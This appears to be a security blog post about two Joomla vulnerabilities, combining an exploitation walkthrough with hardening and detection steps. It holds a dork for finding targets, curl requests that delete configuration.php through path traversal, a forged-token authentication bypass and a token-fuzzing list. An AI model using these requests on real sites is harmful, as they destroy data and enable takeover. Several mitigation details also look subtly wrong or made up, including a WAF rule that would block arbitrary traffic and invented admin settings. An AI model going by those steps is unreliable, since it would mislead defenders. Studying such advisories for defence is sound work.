Listen to this Post

Introduction:
Joomla, one of the world’s most popular content management systems (CMS), has disclosed two critical vulnerabilities – CVE-2026-23898 (unauthenticated file deletion) and CVE-2026-23899 (webservice authentication bypass). These flaws allow remote attackers to delete arbitrary files and manipulate web service endpoints, potentially leading to complete site takeover, data loss, and lateral movement into hosting environments.
Learning Objectives:
- Understand the technical root cause and attack vectors for CVE-2026-23898 and CVE-2026-23899.
- Perform hands-on detection, exploitation simulation, and mitigation using Linux/Windows commands and security tools.
- Implement cloud hardening, API security controls, and incident response steps specific to Joomla deployments.
You Should Know:
- Understanding the Flaws: File Deletion (CVE-2026-23898) and Webservice Bypass (CVE-2026-23899)
The post highlights two severe vulnerabilities in Joomla. CVE-2026-23898 stems from improper input sanitization in the `com_media` component, allowing an attacker to delete any file on the server via path traversal (../../configuration.php). CVE-2026-23899 affects the `com_ajax` webservice endpoint, where missing authentication checks permit unauthenticated calls to privileged API methods.
Step‑by‑step guide to identify vulnerable versions:
- Use the provided Google dork: `HUNTER : http://product.name=”Joomla”` (or simply `intitle:”Joomla”` in Google) to locate potential targets.
- On Linux, scan for Joomla sites with
nmap -p80,443 --script http-joomla-version <target>. - Check version manually by visiting `/administrator/manifests/files/joomla.xml` – versions below 4.4.8 and 5.1.3 are vulnerable.
- For Windows, use PowerShell:
Invoke-WebRequest -Uri "http://target/administrator/manifests/files/joomla.xml" | Select-Object -ExpandProperty Content
- Verify file deletion vulnerability using `curl` (simulate unauthenticated request):
curl -X DELETE "http://target/index.php?option=com_media&task=file.delete&path=../../configuration.php" --cookie "dummy=1"
A successful deletion returns HTTP 200 and removes
configuration.php, rendering the site unusable.
2. Exploitation Simulation and Webservice Abuse
Attackers chain CVE-2026-23899 to bypass authentication on Joomla’s RESTful web services, then trigger CVE-2026-23898 for file deletion.
Step‑by‑step guide to simulate exploitation (for authorized pen testing only):
– Step 1 – Enumerate webservice endpoints. Joomla’s `api/index.php/v1` routes are exposed. Use `curl` to list available endpoints:
curl -X OPTIONS http://target/api/index.php/v1/config/application
– Step 2 – Exploit CVE-2026-23899 by sending a crafted `X-Joomla-Token` header. The flaw accepts any value for the token. Example:
curl -X GET "http://target/api/index.php/v1/config/application" -H "X-Joomla-Token: random"
If you receive configuration data, the site is vulnerable.
– Step 3 – Leverage the authenticated context to delete critical files. The API includes a `files` endpoint. Send:
curl -X DELETE "http://target/api/index.php/v1/files/configuration.php?path=../../" -H "X-Joomla-Token: bypassed"
– On Windows, use Invoke-RestMethod:
Invoke-RestMethod -Uri "http://target/api/index.php/v1/config/application" -Headers @{"X-Joomla-Token"="bypassed"}
– To detect exploitation in real-time, monitor access logs for patterns like `DELETE` requests with `path=../` or abnormal `X-Joomla-Token` values.
- Mitigation and Hardening – Patching and File System Protections
Immediate steps to secure Joomla instances:
Step‑by‑step guide:
- Upgrade Joomla to version 4.4.8, 5.1.3, or later. Use command line for Linux:
sudo php /var/www/html/joomla/cli/joomla.php update:update
- For Windows (XAMPP/WAMP), navigate to the Joomla root and run:
C:\xampp\php\php.exe C:\xampp\htdocs\joomla\cli\joomla.php update:update
- Apply file permission hardening to prevent unauthorized deletion even if vulnerability is exploited:
Linux – set immutable flag on critical files sudo chattr +i /var/www/html/joomla/configuration.php sudo chown -R www-data:www-data /var/www/html/joomla sudo find /var/www/html/joomla -type f -exec chmod 644 {} \; sudo find /var/www/html/joomla -type d -exec chmod 755 {} \;
Windows (NTFS ACLs):
icacls "C:\inetpub\wwwroot\joomla\configuration.php" /inheritance:r /grant "IIS_IUSRS:(R)" icacls "C:\inetpub\wwwroot\joomla" /grant "IIS_IUSRS:(OI)(CI)RX"
– Disable unnecessary web services by editing `/administrator/components/com_ajax/config.xml` and setting <field name="enabled" default="0"/>.
4. Webservice API Security – Implementing Strong Authentication
CVE-2026-23899 reveals the danger of token-based authentication without proper validation. Even after patching, harden Joomla’s API.
Step‑by‑step guide:
- Enable Joomla’s built-in API token enforcement with time‑based one‑time passwords (TOTP). In the Joomla admin panel, go to System → Global Configuration → API and set “API Access” to “Super Users only” and “Token Expiry” to 3600 seconds.
- For additional security, implement an API gateway or WAF rule to reject requests with missing or malformed
X-Joomla-Token. Example ModSecurity rule:SecRule REQUEST_HEADERS:X-Joomla-Token "^$" "deny,status=401,msg='Missing Joomla API token'"
- On Linux, use `iptables` to rate-limit API endpoints:
sudo iptables -A INPUT -p tcp --dport 80 -m string --string "/api/" --algo bm -m limit --limit 10/minute -j ACCEPT sudo iptables -A INPUT -p tcp --dport 80 -m string --string "/api/" --algo bm -j DROP
- For cloud environments (AWS), deploy a Web Application Firewall (WAF) with a rule that inspects headers:
{ "Name": "JoomlaTokenCheck", "Priority": 1, "Statement": { "ByteMatchStatement": { "SearchString": "X-Joomla-Token", "FieldToMatch": { "Header": { "Name": "X-Joomla-Token" } }, "TextTransformations": [], "PositionalConstraint": "EXACTLY" } }, "Action": { "Block": {} } }
- Advanced Detection – Log Analysis and Intrusion Hunting
Proactive detection of exploitation attempts using SIEM queries and command-line forensics.
Step‑by‑step guide:
- On Linux, search Apache/Nginx logs for deletion patterns:
grep -E "DELETE.com_media.task=file.delete|DELETE.api/index.php/v1/files" /var/log/apache2/access.log
- For Windows IIS logs (usually
C:\inetpub\logs\LogFiles), use PowerShell:Get-ChildItem -Path "C:\inetpub\logs\LogFiles\W3SVC1" -Filter ".log" | Select-String -Pattern "DELETE.com_media"
- Set up a file integrity monitoring (FIM) tool like `AIDE` (Linux):
sudo aideinit sudo mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz sudo aide --check | grep "configuration.php"
- For cloud-based Joomla on AWS, enable CloudTrail and GuardDuty to alert on unusual API calls. Create a custom Lambda that parses ELB logs for `X-Joomla-Token` anomalies.
6. Cloud Hardening for Joomla Deployments
Many Joomla sites run on cloud infrastructure. Apply these specific controls.
Step‑by‑step guide:
- Use a Virtual Private Cloud (VPC) with network ACLs to restrict access to the `/administrator` and `/api` paths to only trusted IP ranges.
- For Dockerized Joomla, ensure the container runs as a non‑root user and mount critical files as read‑only:
docker run -d --name joomla -v joomla_config:/var/www/html/configuration.php:ro -e JOOMLA_DB_HOST=... joomla:5.1.3
- Implement a Kubernetes admission controller that blocks pods from mounting host paths that include Joomla configuration files.
- On Azure, use Application Gateway with WAF policy that includes a custom rule for CVE-2026-23898:
@RequestUri contains "com_media" and @RequestUri contains "path=../"
- Regularly scan container images for known vulnerabilities using Trivy:
trivy image joomla:5.1.2 --severity CRITICAL
7. Training and Certification Recommendations
Cybersecurity professionals should deepen skills in CMS exploitation and API security. Recommended courses and commands for practice:
- Set up a vulnerable Joomla lab on your local machine (Linux):
docker run --rm -p 80:80 -e JOOMLA_VERSION=5.1.2 vulnerables/joomla
- Practice the file deletion exploit using `Metasploit` (once a module is released) or manual `curl` scripts.
- Windows users can install XAMPP and download Joomla 5.1.2 from archive.joomla.org, then replicate the attack using Burp Suite.
- Study for certifications: eCPPTv2, OSWA (Offensive Security Web Assessor), or the new Joomla Security Specialist track.
- Enroll in API Security training (e.g., APISec University) to understand token validation flaws. Use `Postman` to fuzz Joomla API endpoints:
Example fuzzing payload list for X-Joomla-Token echo -e "random\nbypassed\nnull\nadmin\n123456" > tokens.txt ffuf -u http://target/api/index.php/v1/config -H "X-Joomla-Token: FUZZ" -w tokens.txt
What Undercode Say:
- CVE-2026-23898 and CVE-2026-23899 highlight a dangerous trend: chaining file deletion with API authentication bypass can lead to rapid, destructive compromises. Even after patching, organizations must adopt defense-in-depth – immutable files, WAF rules, and real-time log monitoring.
- The Joomla ecosystem, like many CMS platforms, suffers from legacy code paths that assume trusted inputs. Developers must enforce strict input validation and never rely solely on token presence for API authorization. Cloud and container deployments amplify risk if read‑only mounts and network segmentation are ignored.
Prediction:
These vulnerabilities will trigger widespread scanning and automated exploitation within 48 hours of public disclosure. We expect a surge in ransomware campaigns targeting Joomla sites – attackers will delete `configuration.php` and index.php, then demand payment for recovery. Hosting providers will rush to patch, but thousands of unmaintained Joomla instances will remain exposed. The incident will accelerate the shift toward headless CMS architectures and API gateways as mandatory security layers, and regulatory bodies may issue urgent advisories for web application owners to implement file integrity monitoring within 30 days.
▶️ Related Video (76% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Omar Aljabr – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


